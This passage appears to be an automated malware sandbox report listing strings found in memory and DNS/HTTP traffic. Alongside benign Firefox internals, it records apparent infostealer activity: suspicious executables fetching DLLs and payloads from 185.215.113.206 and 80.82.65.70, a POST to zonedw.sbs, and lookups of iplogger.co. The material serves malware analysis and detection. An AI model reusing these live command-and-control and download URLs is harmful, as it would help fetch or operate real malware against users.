                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 00000018.00000002.3384694589.000001C7B250E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2876308896.000001C7ACD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 00000018.00000002.2876308896.000001C7ACD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp*://pubads.g.doubleclick.net/gampad/*ad**://securepubads.g.doubleclick.net/gampad/*ad**://www.facebook.com/platform/impression.php**://ads.stickyadstv.com/user-matching**://*.adsafeprotected.com/services/pub*--autocomplete-popup-separator-color@mozilla.org/addons/content-policy;1 equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.3396654277.000001C7B2653000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1AFA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3396654277.000001C7B2673000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.3317668611.000001C7B1AEE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3396654277.000001C7B2621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: global trafficDNS traffic detected: DNS query: t.me
                          Source: global trafficDNS traffic detected: DNS query: zonedw.sbs
                          Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: fightlsoser.click
                          Source: global trafficDNS traffic detected: DNS query: drive-connect.cyou
                          Source: global trafficDNS traffic detected: DNS query: iplogger.co
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----OPHDT2D26F37YM7GV3E3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: zonedw.sbsContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: firefox.exe, 00000018.00000002.3234540323.000001C7B0FA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2811533571.000001C7A166B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.00000000013F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                          Source: b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000867000.00000040.00000001.01000000.00000013.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.000000000139E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.00000000013F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.00000000013F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllA
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllO
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.00000000013F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.00000000013F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dlli
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll%
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3361370625.000000000BCE6000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.00000000013F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php0
                          Source: b6866cbf49.exe, 0000001B.00000002.3361370625.000000000BCE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php=CM
                          Source: b6866cbf49.exe, 0000001B.00000002.3361370625.000000000BCE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpRA
                          Source: b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000867000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpataDataZxcvbnData
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpl
                          Source: b6866cbf49.exe, 0000001B.00000002.3361370625.000000000BCE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpnd
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phprowser
                          Source: b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000867000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://185.215.113.206c4becf79229cb002.phpser
                          Source: 09be480dc7.exe, 00000024.00000003.3905497153.000000000596D000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3480118600.000000000596B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.
                          Source: 09be480dc7.exe, 00000024.00000003.3770635389.00000000056B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/
                          Source: 09be480dc7.exe, 00000024.00000002.4175989012.0000000000EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
                          Source: 09be480dc7.exe, 00000024.00000002.4217329063.00000000055C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/download&
                          Source: 09be480dc7.exe, 00000024.00000002.4217329063.00000000055C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/download4
                          Source: 09be480dc7.exe, 00000024.00000002.4175989012.0000000000EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/key
                          Source: 09be480dc7.exe, 00000024.00000002.4175989012.0000000000EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/keyG
                          Source: 09be480dc7.exe, 00000024.00000003.3556394318.000000000596B000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3595530883.000000000596B000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3727919086.000000000596E000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3768822309.000000000596E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files
                          Source: 09be480dc7.exe, 00000024.00000003.3517779057.000000000596B000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3556394318.000000000596B000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3936858137.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3595530883.000000000596B000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.4078633256.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3727919086.000000000596E000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3905851313.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3768822309.000000000596E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloa
                          Source: 09be480dc7.exe, 00000024.00000003.3557764097.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.3480118600.000000000596B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download
                          Source: 09be480dc7.exe, 00000024.00000003.3442879576.000000000596B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadG
                          Source: 09be480dc7.exe, 00000024.00000002.4175989012.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadzDZZ
                          Source: 09be480dc7.exe, 00000024.00000003.3595530883.000000000596B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloan
                          Source: 09be480dc7.exe, 00000024.00000002.4175989012.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.4079032288.000000000596D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download
                          Source: 09be480dc7.exe, 00000024.00000003.4079032288.000000000596D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/downloadO
                          Source: 09be480dc7.exe, 00000024.00000003.4079032288.000000000596D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/downloadRk
                          Source: 09be480dc7.exe, 00000024.00000002.4175989012.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/downloadXDxZ
                          Source: 09be480dc7.exe, 00000024.00000003.3770635389.00000000056B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/u
                          Source: 09be480dc7.exe, 00000024.00000003.4079032288.000000000596D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.9
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: firefox.exe, 00000018.00000002.2982566429.000001C7AD37D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s_finalizeInternal/this._finalizePromise
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: firefox.exe, 00000018.00000002.3581917097.000001C7B41EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B2518000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 00000018.00000002.3384694589.000001C7B2518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_PROXY_RESPONSE_HEADERbrowserWouldUpgr
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
